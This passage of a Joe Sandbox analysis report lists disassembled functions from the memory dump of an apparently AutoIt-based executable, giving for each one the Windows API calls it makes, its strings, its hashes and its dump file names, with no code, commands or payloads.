Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 79b6f8930cc60e1a2c53aa17b9dc3944cabfef226b5fb97c392dc1e100834f15
Instruction ID: 1ce3d0985ab5620f634abc2c551e9e78e1d51da78b1cf4d5ceddcd446f46ec10
Opcode Fuzzy Hash: 79b6f8930cc60e1a2c53aa17b9dc3944cabfef226b5fb97c392dc1e100834f15
Instruction Fuzzy Hash: BC21C731601214AFDB01AF20EC09F2E7BB9EF44721F108019F916AB3A1CFB5AD11EB54

Uniqueness

Uniqueness Score: -1.00%

Function 00F0C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00ED260D
SetTextColor.GDI32(?,000000FF), ref: 00ED2617
SetBkMode.GDI32(?,00000001), ref: 00ED262C
GetStockObject.GDI32(00000005), ref: 00ED2634
GetClientRect.USER32(?), ref: 00F0C0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 00F0C113
GetWindowDC.USER32(?), ref: 00F0C11F
GetPixel.GDI32(00000000,?,?), ref: 00F0C12E
ReleaseDC.USER32 ref: 00F0C140
GetSysColor.USER32(00000005), ref: 00F0C15E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 72e2edfb500b5723258824dd984eab8100e737b55d6de856fd842fac3bce7a38
Instruction ID: 6bba524e1dd48f74fa30adbd7253d411f578e3f5bba59694a13f00192f572bee
Opcode Fuzzy Hash: 72e2edfb500b5723258824dd984eab8100e737b55d6de856fd842fac3bce7a38
Instruction Fuzzy Hash: 29114C31500209BFDB615FA4EC08BEA7BA1EB19321F244265FA76951E1CFB20951FF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EDAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EDADE1
OleUninitialize.OLE32(?,00000000), ref: 00EDAE80
UnregisterHotKey.USER32(?), ref: 00EDAFD7
DestroyWindow.USER32(?), ref: 00F12F64
FreeLibrary.KERNEL32(?), ref: 00F12FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F12FF6

Strings

close all, xrefs: 00EDADDC

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 5c736c3f9f630cd003f1d7e4f25ea8d5a3f764adbd4d99a34dcfb59402babd4a
Instruction ID: d10b77adce27780817997d9e004a6858649fc6cf3d743c934c82894adc0c6f21
Opcode Fuzzy Hash: 5c736c3f9f630cd003f1d7e4f25ea8d5a3f764adbd4d99a34dcfb59402babd4a
Instruction Fuzzy Hash: C6A16C707012128FCB29EF54C895AA9F3A4FF04714F1452ADE80ABB252DB31AE52DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F2AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32 ref: 00F2B078

Strings

INSTANCE, xrefs: 00F2AF86
TEXT, xrefs: 00F2AFAF
REGEXPCLASS, xrefs: 00F2AE3D
CLASS, xrefs: 00F2ADF7
CLASSNN, xrefs: 00F2AE1A
NAME, xrefs: 00F2AEAA

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: fba1b2b662fffc15bed65d22e00962984de68c1d98807685f6a18a2f495ef58d
Instruction ID: e08632d060efdc7dde0ed834610a1ef0aeb4d8130a2be9210a41105f1849bc5b
Opcode Fuzzy Hash: fba1b2b662fffc15bed65d22e00962984de68c1d98807685f6a18a2f495ef58d
Instruction Fuzzy Hash: C891E571900619EBDB18EF70D481BEEFBB4FF04310F108119E96AA7192DF346999EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00ED31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 00ED327E

Part of subcall function 00ED218F: GetClientRect.USER32(?,?), ref: 00ED21B8
Part of subcall function 00ED218F: GetWindowRect.USER32 ref: 00ED21F9
Part of subcall function 00ED218F: ScreenToClient.USER32 ref: 00ED2221

GetDC.USER32 ref: 00F0D073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F0D086
SelectObject.GDI32(00000000,00000000), ref: 00F0D094
SelectObject.GDI32(00000000,00000000), ref: 00F0D0A9
ReleaseDC.USER32 ref: 00F0D0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F0D13C

Strings

U, xrefs: 00F0D011

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 7cf264a2f45ea129748a683bcbd45be592be4631ceb1b7168ce98474f449ed2e
Instruction ID: f58b645b719ec8312b7668e110e63f1034b36dbfb8941fb78a027d21af113853
Opcode Fuzzy Hash: 7cf264a2f45ea129748a683bcbd45be592be4631ceb1b7168ce98474f449ed2e
Instruction Fuzzy Hash: 0F71F630904209DFCF218FA4CC84AAA7BB5FF49360F24426AFD555A2A9C7318D42FF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

Part of subcall function 00ED2714: GetCursorPos.USER32(?,?,00F977B0,?,00F977B0,00F977B0,?,00F5C5FF,00000000,00000001,?,?,?,00F0BD40,?,?), ref: 00ED2727
Part of subcall function 00ED2714: ScreenToClient.USER32 ref: 00ED2744
Part of subcall function 00ED2714: GetAsyncKeyState.USER32(00000001), ref: 00ED2769
Part of subcall function 00ED2714: GetAsyncKeyState.USER32(00000002), ref: 00ED2777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00F5C69C
ImageList_EndDrag.COMCTL32 ref: 00F5C6A2
ReleaseCapture.USER32 ref: 00F5C6A8
SetWindowTextW.USER32(?,00000000), ref: 00F5C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F5C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00F5C847

Strings

@GUI_DRAGFILE, xrefs: 00F5C7DC
@GUI_DROPID, xrefs: 00F5C799

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: d8f5c37b3f4f6c8290fad8ca7e6f0c8226f6e56cd125ba7ff1699bc3673d21a1
Instruction ID: 276a0ccbc7911e04c56924984ee174475843a785b9d9eac80d0333db08b23a84
Opcode Fuzzy Hash: d8f5c37b3f4f6c8290fad8ca7e6f0c8226f6e56cd125ba7ff1699bc3673d21a1
Instruction Fuzzy Hash: 7051B170504308AFDB00EF14CC55F6B7BE1EB84311F10491EF956972E2DB70A949EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F420E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F4211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F42148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F4218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F4219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F421AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F421DC
InternetCloseHandle.WININET(00000000), ref: 00F42223

Part of subcall function 00F42B4F: GetLastError.KERNEL32(?,?,00F41EE3,00000000,00000000,00000001), ref: 00F42B64
Part of subcall function 00F42B4F: SetEvent.KERNEL32(?,?,00F41EE3,00000000,00000000,00000001), ref: 00F42B79

Strings

, xrefs: 00F421CD

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 954d40e176edbb02f017de96a731c52630b5875e9a244daa4749facbafcf97b1
Instruction ID: 461336b1b628a9d503956a7fb19c5afcf35b5040a5aea591c4f938c1c9293882
Opcode Fuzzy Hash: 954d40e176edbb02f017de96a731c52630b5875e9a244daa4749facbafcf97b1
Instruction Fuzzy Hash: 77417FB1901209BFFB529F50CC85FBB7BACEF48350F504126FE159A141DBB49E44ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F49330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F60980), ref: 00F49412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F60980), ref: 00F49446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F495C0
SysFreeString.OLEAUT32(?), ref: 00F495EA

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 656261606dc0ec149fbed7d029d336b95332212097a15e856e3bfa83e1225986
Instruction ID: 608d02f4a7335ccd07c5e6875e1724fcadb40c5f010882961f318fea62689d80
Opcode Fuzzy Hash: 656261606dc0ec149fbed7d029d336b95332212097a15e856e3bfa83e1225986
Instruction Fuzzy Hash: 3AF16071A04209EFCF14DF94C884EAEBBB9FF45314F248498F916AB251CB71AE46DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F4FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F4FD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4FF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4FF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4FF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4FFB7
CreateProcessW.KERNEL32 ref: 00F50133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F50165
CloseHandle.KERNEL32(?), ref: 00F50194
CloseHandle.KERNEL32(?), ref: 00F5020B

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 41850de91eb16cefbb4fa43b4b24db6e57118eda81795493cc0d8dda6059c357
Instruction ID: eee1c88ac8a82a44abf8cb74e1259bf80a33af2f5da5c9a010e1d8db0bf0609b
Opcode Fuzzy Hash: 41850de91eb16cefbb4fa43b4b24db6e57118eda81795493cc0d8dda6059c357
Instruction Fuzzy Hash: 79E1BE716043419FC724EF24C891B6ABBE1EF85320F14896DF9999B3A2CB31DC49DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F3527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F34BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F33B8A,?), ref: 00F34BE0

Part of subcall function 00F34BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F33B8A,?), ref: 00F34BF9

Part of subcall function 00F34FEC: GetFileAttributesW.KERNEL32(?,00F33BFE), ref: 00F34FED

lstrcmpiW.KERNEL32(?,?), ref: 00F352FB
_wcscmp.LIBCMT ref: 00F35315
MoveFileW.KERNEL32(?,?), ref: 00F35330

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: cee35ca95976d4323aa068fc46afea52d6057041ef96c8a8135bc5b4d48fbb37
Instruction ID: a0f32274707b47677650d4a97fde3fa4e56132a7f3c24e131047ddff5800edbf
Opcode Fuzzy Hash: cee35ca95976d4323aa068fc46afea52d6057041ef96c8a8135bc5b4d48fbb37
Instruction Fuzzy Hash: C95164B24087859BC724DBA0DC819DFB3ECAF84750F50092EF689D3152EF74E6889766

Uniqueness

Uniqueness Score: -1.00%

Function 00F58C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F58D24

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 091fd74d46cdaf997c4e45c207ebdc1b1a9e71963ed9166a6605f55965c3ea56
Instruction ID: 7ad65864124c679bbbcc820e5b2dca72360b9705650ef41faa6a0dd8678b9a90
Opcode Fuzzy Hash: 091fd74d46cdaf997c4e45c207ebdc1b1a9e71963ed9166a6605f55965c3ea56
Instruction Fuzzy Hash: 26519530A40204BFEF209B64CC89B597BB4EB153A2F244516FF15F61E1CF71A95AFA50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00F0C638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0C65A
LoadImageW.USER32 ref: 00F0C672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F0C690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F0C6B1
DestroyIcon.USER32(00000000), ref: 00F0C6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F0C6DD
DestroyIcon.USER32(?), ref: 00F0C6EC

Part of subcall function 00F5AAD4: DeleteObject.GDI32(00000000), ref: 00F5AB0D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 0802c962a1c945832a868c27964f1b13514ccda75a26c0b3fd01b998bbec9bda
Instruction ID: 9a1da56791061cb4dea8f2b0e4fc47c142f72f7a85f54d2abcbd92438f38df59
Opcode Fuzzy Hash: 0802c962a1c945832a868c27964f1b13514ccda75a26c0b3fd01b998bbec9bda
Instruction Fuzzy Hash: 08517D70A00309AFDB20DF24CC45BAA77B5EB54720F205A1DFA56A72D0DBB1ED51EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F2A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F2B54D
Part of subcall function 00F2B52D: GetCurrentThreadId.KERNEL32 ref: 00F2B554
Part of subcall function 00F2B52D: AttachThreadInput.USER32(00000000,?,00F2A23B,?,00000001), ref: 00F2B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00F2A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F2A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F2A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F2A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F2A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F2A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F2A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F2A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F2A2B3

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 0ce746fc57a8247cfb1073ae04567f95f0fd5df32e2e047cb3cdb8226d7e2f6b
Instruction ID: b89e744c5bb4126ced65fdc1cbc46ceabd82eb92f30d8a794ff619f5fe819cee
Opcode Fuzzy Hash: 0ce746fc57a8247cfb1073ae04567f95f0fd5df32e2e047cb3cdb8226d7e2f6b
Instruction Fuzzy Hash: 9111CEB1950218BEF6106B60DC8AF6B3B2DEB4D750F200419F6606B0D1CEF35C50AAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F294D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F2915A,00000B00,?,?), ref: 00F294E2
HeapAlloc.KERNEL32(00000000,?,00F2915A,00000B00,?,?), ref: 00F294E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F2915A,00000B00,?,?), ref: 00F294FE
GetCurrentProcess.KERNEL32(?,00000000,?,00F2915A,00000B00,?,?), ref: 00F29506
DuplicateHandle.KERNEL32(00000000,?,00F2915A,00000B00,?,?), ref: 00F29509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F2915A,00000B00,?,?), ref: 00F29519
GetCurrentProcess.KERNEL32(00F2915A,00000000,?,00F2915A,00000B00,?,?), ref: 00F29521
DuplicateHandle.KERNEL32(00000000,?,00F2915A,00000B00,?,?), ref: 00F29524
CreateThread.KERNEL32 ref: 00F2953E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: d501833e5f694a99c355dfe2545be993808a11b5925e1df14bd5c4095a092fc8
Instruction ID: 04088963406e493538819fa9e14615fe6122a4d33be9726f61b8391e02b068bc
Opcode Fuzzy Hash: d501833e5f694a99c355dfe2545be993808a11b5925e1df14bd5c4095a092fc8
Instruction Fuzzy Hash: 5301CDB5240308BFE710AFA5DC4DF6B7BACEB89711F104411FA15DB1A1CAB19800EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00F4A265
NULL Pointer assignment, xrefs: 00F4A28E, 00F4A5B2

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: b7c17dda5c0ab66cccb5b0b63e41980dc271d64d79b50b8c856db41e7a9bef3c
Instruction ID: b63b13d37ccdaffec5a8a07a85f35359ce33ee211da8d451b3e923de6d561f7a
Opcode Fuzzy Hash: b7c17dda5c0ab66cccb5b0b63e41980dc271d64d79b50b8c856db41e7a9bef3c
Instruction Fuzzy Hash: 24C1AF71E4021A9FDF10DFA8C884AAEBBB5FB48310F148469ED05AB290E770DD44EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F497FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F49851
VariantInit.OLEAUT32(?), ref: 00F49922
VariantInit.OLEAUT32(?), ref: 00F49A23
VariantClear.OLEAUT32(?), ref: 00F49A2D
VariantClear.OLEAUT32(?), ref: 00F49A8A

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00F49A06
